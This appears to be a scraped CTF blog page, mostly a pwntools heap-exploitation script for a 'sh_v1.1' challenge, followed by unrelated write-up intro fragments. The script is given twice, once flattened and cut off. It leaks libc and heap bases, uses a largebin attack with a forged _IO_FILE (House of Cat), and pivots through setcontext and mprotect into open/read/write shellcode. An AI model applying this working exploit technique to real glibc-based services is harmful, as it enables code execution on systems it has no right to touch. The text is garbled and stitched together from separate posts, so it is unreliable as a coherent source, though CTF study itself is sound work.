sh_v1.1​

The challenge implements some shell functionalities, but I really didn't understand the logic behind them. However, it's just obfuscation, so it doesn't matter.

This is an individual competition, but I have already forgotten things related to Web or Rev, let alone Crypto. Meanwhile, we cannot solve the hard challenges, so uh-hum, let's just say I'm not participating for the sake of the ranks LOL

Attachment Repository

Getting into jail competition +1

Written before dinner, the rest has not been reproduced yet

code()) sh.sendafter(b"Content: ", content) sh.sendafter(b"Remark: ", remark)

def show(idx: int): menu(4) sh.sendlineafter(b"Index: ", str(idx).encode())

add(0x460, b'\x00', b'\x00') # 0 add(0x440, b'\x00', b'\x00') # 1 delete(0) show(0)

sh.recvuntil(b"Content: \n") libc_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x1ebbe0 print("libc_base >>>", hex(libc_base))

menu(1) sh.sendlineafter(b"Size: ", str(0x480).encode()) edit(0, b'A'*0x10, b'\x00') show(0)

sh.recvuntil(b'A'*0x10) heap_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x290 print("heap_base >>>", hex(heap_base))

largebin_fd = libc_base + 0x1ebfe0 io_list = libc_base + libc.sym['_IO_list_all']

edit(0, p64(largebin_fd)*2 + p64(heap_base + 0x290) + p64(io_list-0x20), b'\x00') delete(1)

menu(1) sh.sendlineafter(b"Size: ", str(0x480).encode())

io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps'] setcontext = libc_base + libc.sym['setcontext']

fake_io_addr = heap_base + 0xb70 # 伪造的fake_IO结构体的地址 fake_IO_FILE = p64(0) fake_IO_FILE += p64(0) * 5 fake_IO_FILE += p64(1) + p64(2) # rcx!=0(FSOP) fake_IO_FILE += p64(heap_base + 0xfc0 - 0x50) # _IO_backup_base=rdx fake_IO_FILE += p64(setcontext+61) # _IO_save_end=call addr(call setcontext/system) fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00') fake_IO_FILE += p64(0) # _chain fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00') fake_IO_FILE += p64(heap_base+0x1000) # _lock = a writable address fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00') fake_IO_FILE += p64(fake_io_addr+0x30) # _wide_data,rax1_addr fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00') fake_IO_FILE += p64(1) # mode=1 fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00') fake_IO_FILE += p64(io_wfile_jumps+0x30) # vtable=IO_wfile_jumps+0x10 fake_IO_FILE += p64(0) * 6 fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

edit(0, p64(largebin_fd)*2 + fake_IO_FILE + p64(heap_base + 0x290), b'\x00')

delete(1)

sh.interactive()

code())
    sh.sendafter(b"Content: ", content)
    sh.sendafter(b"Remark: ", remark)


def show(idx: int):
    menu(4)
    sh.sendlineafter(b"Index: ", str(idx).encode())


add(0x460, b'\x00', b'\x00')  # 0
add(0x440, b'\x00', b'\x00')  # 1
delete(0)
show(0)

sh.recvuntil(b"Content: \n")
libc_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x1ebbe0
largebin_fd = libc_base + 0x1ebfe0
io_list = libc_base + libc.sym['_IO_list_all']
io_wfile_jumps = libc_base+libc.sym['_IO_wfile_jumps']
setcontext = libc_base + libc.sym['setcontext']
mprotect = libc_base + libc.sym['mprotect']
print("libc_base >>>", hex(libc_base))

menu(1)
sh.sendlineafter(b"Size: ", str(0x480).encode())
edit(0, b'A'*0x10, b'\x00')
show(0)

sh.recvuntil(b'A'*0x10)
heap_base = u64(sh.recv(6).ljust(8, b'\x00')) - 0x290
print("heap_base >>>", hex(heap_base))
edit(0, p64(largebin_fd)*2 + p64(heap_base + 0x290) + p64(io_list-0x20), b'\x00')
delete(1)

menu(1)
sh.sendlineafter(b"Size: ", str(0x480).encode())

# House of cat
fake_io_addr = heap_base + 0xb70                    # Fake address of the fake_IO structure
fake_IO_FILE = p64(0)                               
fake_IO_FILE += p64(0) * 5
fake_IO_FILE += p64(1) + p64(2)                     # rcx!=0(FSOP)
fake_IO_FILE += p64(heap_base + 0xfc0 - 0x50)              # _IO_backup_base=rdx
fake_IO_FILE += p64(setcontext+61)                  # _IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
fake_IO_FILE += p64(0)                              # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
fake_IO_FILE += p64(heap_base+0x1000)               # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)               # _wide_data, rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(1)                              # mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(io_wfile_jumps+0x30)            # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0) * 6
fake_IO_FILE += p64(fake_io_addr+0x40)              # rax2_addr

shellcode = asm(
    '''
    mov rax, 0xc0
    mov rbx, 0x500000
    mov rcx, 0x5000
    mov rdx, 3
    mov rsi, 0x100021
    xor rdi, rdi
    xor rbp, rbp
    int 0x80        # mmap2(0x500000, 0x5000, 3, 0x100021, 0, 0)
    
    mov rdi, 0
    mov rsi, 0x502000
    mov rdx, 0x100
    xor rax, rax
    syscall
     
    mov rax, 5
    mov rbx, 0x502000
    xor rcx, rcx
    xor rdx, rdx
    int 0x80        # open(0x502000, 0, 0)
     
    mov rdi, rax
    mov rsi, 0x503000
    mov rdx, 0x100
    xor rax, rax
    syscall
     
    mov rdi, 1
    mov rax, 1
    syscall
    ''', arch='amd64')

#                           rdi                rsi                   rdx                          rsp           rcx(retn_addr)
payload = p64(0) + p64(heap_base+0x1000) + p64(0x2000) + p64(0)*2 + p64(7) + p64(0)*2 + p64(heap_base+0x1020) + p64(mprotect) + p64(heap_base+0x1028) + shellcode
edit(1, fake_IO_FILE, payload)
gdb.attach(sh, 'b *mprotect')
pause()
menu(5)
sh.send(b'/flag\x00')
sh.interactive()
```

<!-- AI -->

Just recording the PWN challenge from Blue Hat Cup a few days ago. I won't be reenacting the other Misc and forensic challenges as I didn't quite understand them during the competition and relied heavily on my teammates.

After a few months, updating again (laughing emoji).

I revisited the content related to heap a few days ago, as I had forgotten everything I had learned months ago.

This time, I found a challenge on ctf-wiki.

SRC

I compiled it myself, so the addresses will be different from its exploit.

Random Thoughts at the Beginning​

Why is this Pwn challenge so difficult? Can't understand the WriteUp at all. Quitting Pwn immediately

Anyway, let's start by taking down this newbie area of the Attack and Defense World.

After a few days of not-so-systematic three days of fishing and two days of drying nets studying, I can only say I am extremely confident now.

String should be the most interesting and challenging challenge in the novice area of the Attack and Defense World. Let's do this!

cgpwn2 | level3 | CGfsb​

Miscellaneous​

Due to a lot of things happening in the past half month (switching major to APEX, midterm exams), and encountering problems with the new environment, there hasn't been much content related to CTF. However, there hasn't been much progress in other areas either.

Another competition is coming up soon, so I thought of quickly revisiting a few simple stack-related challenges, cramming for it in a hurry.

Initially, I intended to write a detailed write-up for each question, but it seems more basic, so I combined them all together.

Problem​

Preliminary Determination of Ideas​

Using checksec to check the file, it is found that NX and PIE are not enabled, so consider ret2text and ret2shellcode preliminarily.